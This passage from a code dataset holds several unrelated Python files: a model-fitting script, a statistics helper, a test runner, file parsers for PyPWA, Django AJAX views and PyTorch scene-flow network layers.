x in enumerate(obtained_parameters1):\n print(pints.strfloat(x) + ' ' + pints.strfloat(idealparams[k]))\n f.write(pints.strfloat(x) + '\\n')\nprint('Found solution: Ideal parameters:' )\n# Store output\nwith open('%s/%s-solution-%s-3.txt' % (savedir, saveas, fit_seed), 'w') as f:\n for k, x in enumerate(obtained_parameters2):\n print(pints.strfloat(x) + ' ' + pints.strfloat(idealparams[k]))\n f.write(pints.strfloat(x) + '\\n')\n\nfig, axes = plt.subplots(2, 1, sharex=True, figsize=(8, 6))\nsol0 = problem.evaluate(transform_from_model_param(obtained_parameters0))\nsol1 = problem.evaluate(transform_from_model_param(obtained_parameters1))\nsol2 = problem.evaluate(transform_from_model_param(obtained_parameters2))\nvol = model.voltage(times)\naxes[0].plot(times, vol, c='#7f7f7f')\naxes[0].set_ylabel('Voltage (mV)')\naxes[1].plot(times, data, alpha=0.5, label='data')\naxes[1].plot(times, sol0, label='found solution 1')\naxes[1].plot(times, sol1, label='found solution 2')\naxes[1].plot(times, sol2, label='found solution 3')\naxes[1].legend()\naxes[1].set_ylabel('Current (pA)')\naxes[1].set_xlabel('Time (ms)')\nplt.subplots_adjust(hspace=0)\nplt.savefig('%s/%s-solution-%s.png' % (savedir, saveas, fit_seed),\n bbox_inches='tight')\nplt.close()\n","sub_path":"model-cell-experiments/fit-mc3simvc.py","file_name":"fit-mc3simvc.py","file_ext":"py","file_size_in_byte":7043,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"130698815","text":"import math\nimport pandas as pd\nimport numpy as np\n\nclass CentralTendency:\n def __init__(self):\n pass\n \n def Mean(self, values):\n summation = 0\n for x in values:\n summation = summation + x\n mean = summation / len(values)\n return mean\n\n def StandardDeviation(self, values):\n \n mean = self.Mean(values)\n deviation = 0\n for x in values:\n deviation = deviation + ( (x - mean) * (x - mean) )\n standardDeviation = math.sqrt(deviation / (len(values) - 1))\n return standardDeviation\n\n def PearsonCorrelation(self, x, y):\n xMean = self.Mean(x)\n yMean = self.Mean(y)\n\n stdX = self.StandardDeviation(x)\n stdY = self.StandardDeviation(y)\n summ = 0\n for i in range(len(x)):\n summ += (x[i] - xMean) * (y[i] - yMean)\n\n rxy = summ / ((len(x)-1) * stdX * stdY)\n return rxy\n\n def MinMaxNorm(self, values):\n xMin = min(values)\n xMax = max(values)\n newValues = []\n for i in range(len(values)):\n newValues.append( (values[i] - xMin) / (xMax - xMin)) \n \n return newValues\n\n\ndef main():\n data = pd.read_csv(\"toy-example.csv\")\n heights = data['Height']\n print(heights)\n weights = data['Weight']\n calc = CentralTendency()\n\n stdForHeight = calc.StandardDeviation(heights)\n stdForWeight = calc.StandardDeviation(weights)\n\n print(stdForHeight)\n print(stdForWeight)\n print(np.std(heights, ddof=1))\n print(np.std(weights, ddof=1))\n\n rxy = calc.PearsonCorrelation(heights, weights)\n \n # print(data.corr(method='pearson'))\n if abs(rxy) < 0.00005:\n print(\"No Corelation : \", rxy)\n elif rxy > 0:\n print(\"Positive Correlation : \", rxy)\n elif rxy < 0:\n print(\"Negative Correlation : \", rxy)\n\n normedHeights = calc.MinMaxNorm(heights)\n normedWeights = calc.MinMaxNorm(weights)\n\n print(normedHeights)\n\n rxy = calc.PearsonCorrelation(heights, weights)\n\n if abs(rxy) < 0.00005:\n print(\"No Corelation : \", rxy)\n elif rxy > 0:\n print(\"Positive Correlation : \", rxy)\n elif rxy < 0:\n print(\"Negative Correlation : \", rxy)\n\n\n\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"Exercise-02/CentralTendency.py","file_name":"CentralTendency.py","file_ext":"py","file_size_in_byte":2278,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"432455159","text":"#!/usr/bin/env python\n\n# Import libraries\nimport os\nimport sys\nimport json\nimport logging\n\n# Start logger\nfor handler in logging.root.handlers[:]:\n logging.root.removeHandler(handler)\nlogging.basicConfig(level=logging.DEBUG, filename='output.log', filemode='w')\n\nlogger = logging.getLogger(__name__)\nlogger.setLevel(logging.DEBUG)\n\n# Import environment variables\nenv_path = os.path.join(os.path.dirname(__file__), 'dev.env')\ntry:\n with open(env_path) as f:\n env_data = json.load(f)\n os.environ.update(env_data)\nexcept Exception as error:\n logger.exception('Could not load dev.env due to %s.', str(error))\nos.environ['local'] = 'true'\n\n# Update path\nsys.path.insert(\n 0, \n os.path.abspath(\n os.path.join(\n os.path.dirname(__file__), \n '..'\n )\n )\n)\n\n\ndef generate_event(detail=None):\n \"\"\"Generate a test EventBridge event with the given detail.\"\"\"\n detail = {} if detail is None else detail\n return {\n 'Records': [\n {\n 'source': 'testing.local',\n 'detail-type': 'Local Testing',\n 'detail': json.dumps(detail),\n }\n ]\n }\n\n\nif __name__ == \"__main__\":\n from handler import main\n\n with open('bookdata.json') as file:\n event = generate_event(json.load(file))\n response = main(event)\n\n logger.info('Reports: %s', json.dumps(response, indent=2))\n with open('reports.json', 'w') as reports:\n json.dump(response, reports, indent=2)","sub_path":"tests/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1505,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"197201730","text":"\"\"\"\nA collection of file handlers for PyPWA\n\"\"\"\n__author__ = \"Mark Jones\"\n__credits__ = [\"Mark Jones\", \"Josh Pond\"]\n__license__ = \"MIT\"\n__version__ = \"2.0.0\"\n__maintainer__ = \"Mark Jones\"\n__email__ = \"maj@jlab.org\"\n__status__ = \"Beta0\"\n\nimport PyPWA.data.data_tools as data_tools\nfrom PyPWA.data.memory import sv, kv\nimport os\nimport yaml\n\n\nclass DataInterface(object):\n \"\"\"Interface for Data Objects\"\"\"\n\n @staticmethod\n def parse(file_location):\n raise NotImplementedError(\"Object doesn't implement parse()\")\n\n @staticmethod\n def write(file_location, data):\n raise NotImplementedError(\"Object doesn't implement write()\")\n\n\nclass Kv(DataInterface):\n\n @staticmethod\n def parse(file_location):\n with open(file_location) as stream:\n first_line = stream.readline()\n\n if \"=\" in first_line:\n reader = kv.DictOfArrays()\n elif len(first_line.strip(\"\\n\")) == 1:\n reader = kv.ListOfBooleans()\n elif len(first_line.strip(\"\\n\")) > 1:\n reader = kv.ListOfFloats()\n else:\n raise TypeError(\"Unknown data type for {0} !\".format(file_location))\n\n return reader.parse(file_location)\n\n @staticmethod\n def write(file_location, data):\n data_check = data_tools.DataTypes()\n the_type = data_check.type(data)\n\n if the_type == \"dictofarrays\":\n writer = kv.DictOfArrays()\n elif the_type == \"listofbools\":\n writer = kv.ListOfBooleans()\n elif the_type == \"listoffloats\":\n writer = kv.ListOfFloats()\n else:\n raise TypeError(\"Unknown type {0} !\".format(the_type))\n\n writer.write(file_location, data)\n\n\nclass Sv(DataInterface):\n\n @staticmethod\n def parse(file_location):\n file_ext = os.path.splitext(file_location)[1]\n\n if file_ext == \".tsv\":\n parser = sv.SvParser(\"\\t\")\n elif file_ext == \".csv\":\n parser = sv.SvParser(\",\")\n else:\n raise TypeError(\"Variable separated files must end in .tsv or .csv!\")\n\n return parser.reader(file_location)\n\n @staticmethod\n def write(file_location, data):\n raise NotImplementedError(\"Writing of Variable Separated files is not yet supported\")\n\n\nclass Binary(DataInterface):\n def __init__(self):\n raise NotImplementedError(\"There isn't any defined standard yet\")\n\n\nclass Yaml(DataInterface):\n \"\"\"YAML Parsing Object\"\"\"\n\n @staticmethod\n def parse(file_location):\n \"\"\"Parses Yaml configuration files from disk\n Args:\n file_location (str): Path to the file\n Returns:\n dict: The values stored in a multidimensional dictionary\n \"\"\"\n with open(file_location) as stream:\n saved = yaml.load(stream)\n return saved\n\n @staticmethod\n def write(file_location, data):\n \"\"\"Writes YAML Configs to disk\n Args:\n file_location (str): Path to the file\n data (dict): Dictionary to write.\n \"\"\"\n\n with open(file_location, \"w\") as stream:\n stream.write(yaml.dump(data))\n","sub_path":"PyPWA/data/memory_wrapper.py","file_name":"memory_wrapper.py","file_ext":"py","file_size_in_byte":3125,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"470734828","text":"from django.conf import settings\r\nfrom django.http import JsonResponse, FileResponse\r\nfrom django.template.loader import render_to_string\r\nfrom django.utils.translation import ugettext as _\r\n\r\nimport os\r\n\r\nfrom main.forms import *\r\n\r\n# ajax api\r\n\r\n#@ajax_only('GET')\r\ndef tree_root_nodes(request, nodes_form=TreeRootForm):\r\n # tree of left panel, root paging by letter\r\n # create date: 2017-02-13\r\n # author: doo\r\n # last update: doo @ 2017-02-27\r\n data = {}\r\n form = nodes_form(request, data=request.GET)\r\n if form.is_valid():\r\n data.update(form.get_result())\r\n else:\r\n data.update({'code': 2, 'error': _('Argument error.'),})\r\n return JsonResponse(data)\r\n\r\n#@ajax_only('GET')\r\ndef tree_children_nodes(request, nodes_form=TreeChildrenForm):\r\n # tree of left panel, children nodes of any rank\r\n # create date: 2017-02-13\r\n # author: doo\r\n # last update: doo @ 2017-02-27\r\n data = {}\r\n form = nodes_form(request, data=request.GET)\r\n if form.is_valid():\r\n data.update(form.get_result())\r\n else:\r\n data.update({'code': 2, 'error': _('Argument error.'),})\r\n return JsonResponse(data)\r\n\r\n#@ajax_only('GET')\r\ndef node_full_path(request, path_form=NodePathForm):\r\n # full path to a node\r\n # create date: 2017-02-13\r\n # author: doo\r\n # last update: doo @ 2017-02-27\r\n data = {}\r\n form = path_form(request, data=request.GET)\r\n if form.is_valid():\r\n data.update(form.get_result(type_name='dict'))\r\n else:\r\n data.update({'code': 2, 'error': _('Argument error.'),})\r\n return JsonResponse(data)\r\n\r\ndef node_detail(request, detail_form=NodeDetailForm, \r\n template_name='main/api/node_detail.html'):\r\n # detail information of a node\r\n # create date: 2017-02-13\r\n # author: doo\r\n # last update: doo @ 2017-03-01\r\n data = {}\r\n form = detail_form(request, data=request.GET)\r\n if form.is_valid():\r\n data_tmp = form.get_result()\r\n html_tmp = render_to_string(template_name, data_tmp['data']['json'])\r\n html_tmp_list = html_tmp.split('');\r\n data_tmp['data']['html'] = {\r\n 'description': html_tmp_list[0],\r\n 'omics': html_tmp_list[1],\r\n 'data': html_tmp_list[2],\r\n }\r\n data.update(data_tmp)\r\n else:\r\n data.update({'code': 2, 'error': _('Argument error.'),})\r\n return JsonResponse(data)\r\n\r\n#@ajax_only('GET')\r\ndef tree_visualization_data(request, data_form=TreeVisualForm):\r\n # data of a tree for visualization\r\n # create date: 2017-02-13\r\n # author: doo\r\n # last update: doo @ 2017-02-27\r\n data = {}\r\n form = data_form(request, data=request.GET)\r\n if form.is_valid():\r\n data = form.get_result()\r\n else:\r\n data.update({'code': 2, 'error': _('Argument error.'),})\r\n return JsonResponse(data)\r\n\r\n#@ajax_only('GET')\r\ndef node_filter(request, filter_form=NodeForm):\r\n # filter a node by name only\r\n # create date: 2017-02-13\r\n # author: doo\r\n # last update: doo @ 2017-02-27\r\n data = {}\r\n form = filter_form(request, data=request.GET)\r\n if form.is_valid():\r\n data.update(form.get_filter_result())\r\n else:\r\n data.update({'code': 2, 'error': _('Argument error.'),})\r\n return JsonResponse(data)\r\n\r\n#@ajax_only('GET')\r\ndef node_search(request, search_form=NodeForm, template_name='main/api/node_search.html'):\r\n # full text search result of a search\r\n # create date: 2017-02-13\r\n # author: doo\r\n # last update: doo @ 2017-03-03\r\n data = {'code': 0}\r\n form = search_form(request, data=request.GET)\r\n if form.is_valid():\r\n tmp_data = form.get_search_result()\r\n data['data'] = {\r\n 'html': render_to_string(template_name, tmp_data['data']), \r\n 'total': tmp_data['data']['total'],\r\n 'time': tmp_data['data']['time'],\r\n }\r\n else:\r\n data.update({'code': 2, 'error': _('Argument error.'),})\r\n return JsonResponse(data)\r\n\r\ndef download(request, filename=None):\r\n # return a file\r\n # create date: 2017-02-13\r\n # author: doo\r\n # last update: doo @ 2017-02-27\r\n if filename is not None:\r\n filepath = settings.DATA_FILE_DIR + filename\r\n if os.path.exists(filepath):\r\n response = FileResponse(open(filepath, 'rb'), content_type='application/plain-text')\r\n response['Content-Disposition'] = ('attachment; filename=\"%s\"' % filename)\r\n return response\r\n return JsonResponse({\r\n 'code': 2,\r\n 'error': 'invalid_link',\r\n })\r\n ","sub_path":"website/main/views/ajax_api.py","file_name":"ajax_api.py","file_ext":"py","file_size_in_byte":4292,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"424923373","text":"from __future__ import absolute_import, division, print_function\n\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as tf\nimport logging \n\nfrom utils.interpolation import interpolate2d_as\nfrom utils.sceneflow_util import pixel2pts_ms, pts2pixel_ms, pts2pixel\nfrom utils.sceneflow_util import pixel2pts_ms_and_depth, pixel2pts_ms_from_depth, pixel2pts_ms_and_uv1grid, disp2depth_kitti, depth2disp_kitti\n\nfrom utils.interpolation import interpolate2d_as_enlarge_only\n\ndef get_grid(x):\n grid_H = torch.linspace(-1.0, 1.0, x.size(3)).view(1, 1, 1, x.size(3)).expand(x.size(0), 1, x.size(2), x.size(3))\n grid_V = torch.linspace(-1.0, 1.0, x.size(2)).view(1, 1, x.size(2), 1).expand(x.size(0), 1, x.size(2), x.size(3))\n grid = torch.cat([grid_H, grid_V], 1)\n grids_cuda = grid.float().requires_grad_(False).cuda()\n return grids_cuda\n\n\nclass WarpingLayer_Flow(nn.Module):\n def __init__(self):\n super(WarpingLayer_Flow, self).__init__()\n\n torch_vs = torch.__version__\n digits = torch_vs.split(\".\")\n torch_vs_n = float(digits[0]) + float(digits[1]) * 0.1\n self.grid_sample_specify_align_flag = torch_vs_n >= 1.3 \n\n def forward(self, x, flow):\n flo_list = []\n flo_w = flow[:, 0] * 2 / max(x.size(3) - 1, 1)\n flo_h = flow[:, 1] * 2 / max(x.size(2) - 1, 1)\n flo_list.append(flo_w)\n flo_list.append(flo_h)\n flow_for_grid = torch.stack(flo_list).transpose(0, 1)\n grid = torch.add(get_grid(x), flow_for_grid).transpose(1, 2).transpose(2, 3) \n if self.grid_sample_specify_align_flag:\n x_warp = tf.grid_sample(x, grid, align_corners=True)\n else:\n x_warp = tf.grid_sample(x, grid)\n\n mask = torch.ones(x.size(), requires_grad=False).cuda()\n if self.grid_sample_specify_align_flag:\n mask = tf.grid_sample(mask, grid, align_corners=True)\n else:\n mask = tf.grid_sample(mask, grid)\n\n # ### Original\n # mask = (mask >= 1.0).float()\n\n ### from PWC-Net\n # mask[mask<0.9999] = 0\n # mask[mask>0] = 1\n mask = (mask >= 0.9999).float() # changed Nov 1\n\n return x_warp * mask\n\nclass WarpingLayer_FlowNormalized(nn.Module):\n def __init__(self):\n super(WarpingLayer_FlowNormalized, self).__init__()\n\n torch_vs = torch.__version__\n digits = torch_vs.split(\".\")\n torch_vs_n = float(digits[0]) + float(digits[1]) * 0.1\n self.grid_sample_specify_align_flag = torch_vs_n >= 1.3 \n\n def forward(self, x, flow):\n\n _, _, h_x, w_x = x.size()\n assert flow.shape[2] == h_x, \"{} {}\".format(x.shape, flow.shape)\n assert flow.shape[3] == w_x, \"{} {}\".format(x.shape, flow.shape)\n flow = flow * w_x\n \n flo_list = []\n flo_w = flow[:, 0] * 2 / max(x.size(3) - 1, 1)\n flo_h = flow[:, 1] * 2 / max(x.size(2) - 1, 1)\n flo_list.append(flo_w)\n flo_list.append(flo_h)\n flow_for_grid = torch.stack(flo_list).transpose(0, 1)\n grid = torch.add(get_grid(x), flow_for_grid).transpose(1, 2).transpose(2, 3) \n if self.grid_sample_specify_align_flag:\n x_warp = tf.grid_sample(x, grid, align_corners=True)\n else:\n x_warp = tf.grid_sample(x, grid)\n\n mask = torch.ones(x.size(), requires_grad=False).cuda()\n if self.grid_sample_specify_align_flag:\n mask = tf.grid_sample(mask, grid, align_corners=True)\n else:\n mask = tf.grid_sample(mask, grid)\n\n # ### Original\n # mask = (mask >= 1.0).float()\n\n ### from PWC-Net\n # mask[mask<0.9999] = 0\n # mask[mask>0] = 1\n mask = (mask >= 0.9999).float() # changed Nov 1\n\n return x_warp * mask\n\n\nclass WarpingLayer_SF(nn.Module):\n def __init__(self, reg_depth):\n super(WarpingLayer_SF, self).__init__()\n \n torch_vs = torch.__version__\n digits = torch_vs.split(\".\")\n torch_vs_n = float(digits[0]) + float(digits[1]) * 0.1\n self.grid_sample_specify_align_flag = torch_vs_n >= 1.3 \n\n self.reg_depth = reg_depth\n\n def forward(self, x, sceneflow, disp, k1, input_size):\n\n _, _, h_x, w_x = x.size()\n local_scale = torch.zeros_like(input_size)\n local_scale[:, 0] = h_x\n local_scale[:, 1] = w_x\n\n ### adapt to depth input\n if self.reg_depth:\n depth = disp\n pts1, k1_scale = pixel2pts_ms_from_depth(k1, depth, local_scale / input_size)\n _, _, coord1 = pts2pixel_ms(k1_scale, pts1, sceneflow, [h_x, w_x])\n\n else:\n disp = interpolate2d_as(disp, x) * w_x\n pts1, k1_scale = pixel2pts_ms(k1, disp, local_scale / input_size)\n _, _, coord1 = pts2pixel_ms(k1_scale, pts1, sceneflow, [h_x, w_x])\n\n grid = coord1.transpose(1, 2).transpose(2, 3)\n if self.grid_sample_specify_align_flag:\n x_warp = tf.grid_sample(x, grid, align_corners=True)\n else:\n x_warp = tf.grid_sample(x, grid)\n\n mask = torch.ones_like(x, requires_grad=False)\n if self.grid_sample_specify_align_flag:\n mask = tf.grid_sample(mask, grid, align_corners=True)\n else:\n mask = tf.grid_sample(mask, grid)\n\n # ### Original\n # mask = (mask >= 1.0).float()\n\n ### from PWC-Net\n # mask[mask<0.9999] = 0\n # mask[mask>0] = 1\n mask = (mask >= 0.9999).float() # changed Nov 1\n\n return x_warp * mask\n\n\ndef initialize_msra(modules):\n logging.info(\"Initializing MSRA\")\n for layer in modules:\n if isinstance(layer, nn.Conv2d):\n nn.init.kaiming_normal_(layer.weight)\n if layer.bias is not None:\n nn.init.constant_(layer.bias, 0)\n\n elif isinstance(layer, nn.ConvTranspose2d):\n nn.init.kaiming_normal_(layer.weight)\n if layer.bias is not None:\n nn.init.constant_(layer.bias, 0)\n\n elif isinstance(layer, nn.LeakyReLU):\n pass\n\n elif isinstance(layer, nn.Sequential):\n pass\n\n\ndef upsample_outputs_as(input_list, ref_list):\n output_list = []\n for ii in range(0, len(input_list)):\n output_list.append(interpolate2d_as(input_list[ii], ref_list[ii]))\n\n return output_list\n\n### add an enlarge_only mode\ndef upsample_outputs_as_enlarge_only(input_list, ref_list):\n output_list = []\n for ii in range(0, len(input_list)):\n output_list.append(interpolate2d_as_enlarge_only(input_list[ii], ref_list[ii]))\n\n return output_list\n\ndef conv(in_planes, out_planes, kernel_size=3, stride=1, dilation=1, isReLU=True):\n if isReLU:\n return nn.Sequential(\n nn.Conv2d(in_planes, out_planes, kernel_size=kernel_size, stride=stride, dilation=dilation,\n padding=((kernel_size - 1) * dilation) // 2, bias=True),\n nn.LeakyReLU(0.1, inplace=True)\n )\n else:\n return nn.Sequential(\n nn.Conv2d(in_planes, out_planes, kernel_size=kernel_size, stride=stride, dilation=dilation,\n padding=((kernel_size - 1) * dilation) // 2, bias=True)\n )\n\n\nclass upconv(nn.Module):\n def __init__(self, num_in_layers, num_out_layers, kernel_size, scale):\n super(upconv, self).__init__()\n self.scale = scale\n self.conv1 = conv(num_in_layers, num_out_layers, kernel_size, 1)\n\n def forward(self, x):\n x = nn.functional.interpolate(x, scale_factor=self.scale, mode='nearest')\n return self.conv1(x)\n\n\nclass FeatureExtractor(nn.Module):\n def __init__(self, num_chs):\n super(FeatureExtractor, self).__init__()\n self.num_chs = num_chs\n self.convs = nn.ModuleList()\n\n for l, (ch_in, ch_out) in enumerate(zip(num_chs[:-1], num_chs[1:])):\n layer = nn.Sequential(\n conv(ch_in, ch_out, stride=2),\n conv(ch_out, ch_out)\n )\n self.convs.append(layer)\n\n def forward(self, x):\n feature_pyramid = []\n for conv in self.convs:\n x = conv(x)\n feature_pyramid.append(x)\n\n return feature_pyramid[::-1]\n\n\nclass MonoSceneFlowDecoder(nn.Module):\n def __init__(self, ch_in):\n super(MonoSceneFlowDecoder, self).__init__()\n\n self.convs = nn.Sequential(\n conv(ch_in, 128),\n conv(128, 128),\n conv(128, 96),\n conv(96, 64),\n conv(64, 32)\n )\n self.conv_sf = conv(32, 3, isReLU=False)\n self.conv_d1 = conv(32, 1, isReLU=False)\n\n def forward(self, x):\n x_out = self.convs(x)\n sf = self.conv_sf(x_out)\n disp1 = self.conv_d1(x_out)\n\n return x_out, sf, disp1, None, None\n\nclass MonoSceneFlowUVDDecoder(nn.Module):\n def __init__(self, ch_in):\n super(MonoSceneFlowUVDDecoder, self).__init__()\n\n self.convs = nn.Sequential(\n conv(ch_in, 128),\n conv(128, 128),\n conv(128, 96),\n conv(96, 64),\n conv(64, 32)\n )\n self.conv_sf = conv(32, 3, isReLU=False)\n self.conv_d1 = conv(32, 1, isReLU=False)\n self.sf_nl = torch.nn.Sigmoid()\n\n def forward(self, x):\n x_out = self.convs(x)\n sf = self.conv_sf(x_out)\n disp1 = self.conv_d1(x_out)\n\n sf = self.sf_nl(sf) * 0.3\n sf = 2 * sf - 0.3\n\n return x_out, sf, disp1, None, None\n\nclass MonoSceneFlowMaskDecoder(nn.Module):\n def __init__(self, ch_in):\n super(MonoSceneFlowMaskDecoder, self).__init__()\n\n self.convs = nn.Sequential(\n conv(ch_in, 128),\n conv(128, 128),\n conv(128, 96),\n conv(96, 64),\n conv(64, 32)\n )\n self.conv_sf = conv(32, 3, isReLU=False)\n self.conv_d1 = conv(32, 1, isReLU=False)\n self.conv_mask = conv(32, 1, isReLU=False)\n\n def forward(self, x):\n x_out = self.convs(x)\n sf = self.conv_sf(x_out)\n disp1 = self.conv_d1(x_out)\n\n mask = self.conv_mask(x_out)\n mask = torch.sigmoid(mask)\n\n return x_out, sf, disp1, None, mask\n\nclass PoseHead(nn.Module):\n def __init__(self, separable):\n super(PoseHead, self).__init__()\n if separable:\n self.conv_pose = nn.Sequential(\n SpatialPyramidPooling([1, 2, 4, 8]), # B*C(32)*N(43)\n nn.Linear(85, 16), # B*N(32)*C(16)\n # nn.Linear(43, 16), # B*N(32)*C(16)\n nn.ReLU(), \n Transpose(-1, -2), # B*C(16)*N(32)\n nn.Linear(32, 16), # B*C(16)*N(16)\n nn.ReLU(), \n Flatten(), # B*N(256)\n nn.Linear(256, 6) # B*N(6)\n )\n else:\n self.conv_pose = nn.Sequential(\n SpatialPyramidPooling([1, 2, 4, 8]),\n Flatten(),\n nn.Linear(85*32, 16), \n nn.ReLU(), \n nn.Linear(16, 6), \n )\n def forward(self, x):\n pose = self.conv_pose(x)\n return pose\n \n\nclass MonoSceneFlowPoseDecoder(nn.Module):\n def __init__(self, ch_in, separable, conv_pose=None):\n super(MonoSceneFlowPoseDecoder, self).__init__()\n\n self.convs = nn.Sequential(\n conv(ch_in, 128),\n conv(128, 128),\n conv(128, 96),\n conv(96, 64),\n conv(64, 32)\n )\n self.conv_sf = conv(32, 3, isReLU=False)\n self.conv_d1 = conv(32, 1, isReLU=False)\n\n self.conv_mask = conv(32, 1, isReLU=False)\n\n ### separable\n # self.conv_pose = nn.Sequential(\n # SpatialPyramidPooling([1, 2, 4, 8]), # B*C(32)*N(43)\n # Transpose(-1, -2), # B*N(43)*C(32)\n # nn.Linear(32, 16), # B*N(43)*C(16)\n # nn.BatchNorm1d(43), \n # nn.ReLU(), \n # Transpose(-1, -2), # B*C(16)*N(43)\n # nn.Linear(43, 16), # B*C(16)*N(16)\n # nn.BatchNorm1d(16), \n # nn.ReLU(), \n # Flatten(), # B*N(256)\n # nn.Linear(256, 6) # B*N(6)\n # )\n if conv_pose is None:\n if separable:\n self.conv_pose = nn.Sequential(\n SpatialPyramidPooling([1, 2, 4, 8]), # B*C(32)*N(43)\n nn.Linear(85, 16), # B*N(32)*C(16)\n # nn.Linear(43, 16), # B*N(32)*C(16)\n nn.ReLU(), \n Transpose(-1, -2), # B*C(16)*N(32)\n nn.Linear(32, 16), # B*C(16)*N(16)\n nn.ReLU(), \n Flatten(), # B*N(256)\n nn.Linear(256, 6) # B*N(6)\n )\n else:\n self.conv_pose = nn.Sequential(\n SpatialPyramidPooling([1, 2, 4, 8]),\n Flatten(),\n nn.Linear(85*32, 16), \n nn.ReLU(), \n nn.Linear(16, 6), \n )\n else:\n self.conv_pose = conv_pose\n\n def forward(self, x):\n x_out = self.convs(x)\n sf = self.conv_sf(x_out)\n disp1 = self.conv_d1(x_out)\n\n pose = self.conv_pose(x_out)\n # pose = pose * 0.1\n # pose[:, :3] = 0.1 * pose[:, :3]\n\n mask = self.conv_mask(x_out)\n mask = torch.sigmoid(mask)\n \n return x_out, sf, disp1, pose, mask\n\nclass MonoSceneFlowPoseHourGlass(nn.Module):\n # def __init__(self, ch_in, hourglass):\n def __init__(self, ch_in):\n super(MonoSceneFlowPoseHourGlass, self).__init__()\n self.conv = conv(ch_in, 32, 1, 1, 1)\n # self.hourglass = hourglass\n\n def forward(self, x):\n x = self.conv(x)\n return x\n # # x = interpolate2d_as(x, x_full)\n # disp_dicts, flow_dicts, mask_dicts, pose, iconv1 = self.hourglass(x)\n # return iconv1, flow_dicts[\"1\"], disp_dicts[\"1\"], pose, mask_dicts[\"1\"]\n\n\nclass RigidFlowFromPose(nn.Module):\n def __init__(self, reg_depth):\n super(RigidFlowFromPose, self).__init__()\n\n self.reg_depth = reg_depth\n\n def forward(self, pose, disp, k_aug, aug_size):\n\n ### scale disp to pixel unit\n _, _, h_dp, w_dp = disp.size()\n\n ## scale alignment between input and current resolution (since it is coarse-to-fine)\n local_scale = torch.zeros_like(aug_size)\n local_scale[:, 0] = h_dp\n local_scale[:, 1] = w_dp \n\n if self.reg_depth:\n depth = disp\n pts, k_scale = pixel2pts_ms_from_depth(k_aug, depth, local_scale / aug_size)\n else:\n disp = disp * w_dp\n pts, k_scale, depth = pixel2pts_ms_and_depth(k_aug, disp, local_scale / aug_size)\n\n # pose = torch.zeros_like(pose)\n # pose[:, 5] = 1\n ### apply transform\n T = transformation_from_parameters(pose[:, :3].unsqueeze(1), pose[:, 3:].unsqueeze(1)) # pose is B*6, T is B*4*4\n R = T[:, :3, :3] # B*3*3\n t = T[:, :3, 3:] # B*3*1\n pts_flat = pts.flatten(start_dim=2) # B*3*N\n pts_transformed = torch.matmul(R, pts_flat) + t\n pts_transformed_grid = pts_transformed.reshape_as(pts)\n rigid_flow = pts_transformed_grid - pts\n\n return rigid_flow, depth, k_scale, R, t\n\n\nclass ContextNetwork(nn.Module):\n def __init__(self, ch_in, reg_depth):\n super(ContextNetwork, self).__init__()\n\n self.convs = nn.Sequential(\n conv(ch_in, 128, 3, 1, 1),\n conv(128, 128, 3, 1, 2),\n conv(128, 128, 3, 1, 4),\n conv(128, 96, 3, 1, 8),\n conv(96, 64, 3, 1, 16),\n conv(64, 32, 3, 1, 1)\n )\n self.conv_sf = conv(32, 3, isReLU=False)\n self.reg_depth = reg_depth\n if self.reg_depth:\n self.conv_d1 = nn.Sequential(\n conv(32, 1, isReLU=False), \n torch.nn.Softplus()\n )\n else:\n self.conv_d1 = nn.Sequential(\n conv(32, 1, isReLU=False), \n torch.nn.Sigmoid()\n )\n\n def forward(self, x):\n\n x_out = self.convs(x)\n sf = self.conv_sf(x_out)\n if self.reg_depth:\n d = self.conv_d1(x_out)\n d = d.clamp(min=1e-3, max=80)\n else:\n d = self.conv_d1(x_out) * 0.3\n\n return sf, d\n\nclass Flatten(nn.Module):\n ### in pytorch 1.2 there is not Flatten layer. In pytorch1.6 there is \n ### https://discuss.pytorch.org/t/flatten-layer-of-pytorch-build-by-sequential-container/5983\n def forward(self, x):\n return x.view(x.size(0), -1)\n\nclass Transpose(nn.Module):\n def __init__(self, dim0, dim1):\n super(Transpose, self).__init__()\n self.dim0 = dim0\n self.dim1 = dim1\n\n def forward(self, x):\n return x.transpose(self.dim0, self.dim1)\n\n\nclass SpatialPyramidPooling(nn.Module):\n \"\"\"Generate fixed length representation regardless of image dimensions\n Based on the paper \"Spatial Pyramid Pooling in Deep Convolutional Networks\n for Visual Recognition\" (https://arxiv.org/pdf/1406.4729.pdf)\n :param [int] num_pools: Number of pools to split each input feature map into.\n Each element must be a perfect square in order to equally divide the\n pools across the feature map. Default corresponds to the original\n paper's implementation\n :param str mode: Specifies the type of pooling, either max or avg\n See: \n https://github.com/addisonklinke/pytorch-architectures/blob/master/torcharch/modules/conv.py\n https://discuss.pytorch.org/t/elegant-implementation-of-spatial-pyramid-pooling-layer/831/2\n \"\"\"\n\n def __init__(self, num_pools=[1, 2, 4], mode='max'):\n super(SpatialPyramidPooling, self).__init__()\n self.name = 'SpatialPyramidPooling'\n if mode == 'max':\n pool_func = nn.AdaptiveMaxPool2d\n elif mode == 'avg':\n pool_func = nn.AdaptiveAvgPool2d\n else:\n raise NotImplementedError(f\"Unknown pooling mode '{mode}', expected 'max' or 'avg'\")\n self.pools = nn.ModuleList([])\n for p in num_pools:\n # self.pools.append( pool_func( (max(1,int(p/2)), int(p)) ) )\n self.pools.append( pool_func( (int(p), int(p)) ) )\n\n def forward(self, feature_maps):\n \"\"\"Pool feature maps at different bin levels and concatenate\n :param torch.tensor feature_maps: Arbitrarily shaped spatial and\n channel dimensions extracted from any generic convolutional\n architecture. Shape ``(N, C, H, W)``\n :return torch.tensor pooled: Concatenation of all pools with shape\n ``(N, C, sum(num_pools))``\n \"\"\"\n assert feature_maps.dim() == 4, 'Expected 4D input of (N, C, H, W)'\n batch_size = feature_maps.size(0)\n channels = feature_maps.size(1)\n pooled = []\n for p in self.pools:\n pooled.append(p(feature_maps).view(batch_size, channels, -1))\n return torch.cat(pooled, dim=2)\n\n\ndef transformation_from_parameters(axisangle, translation, 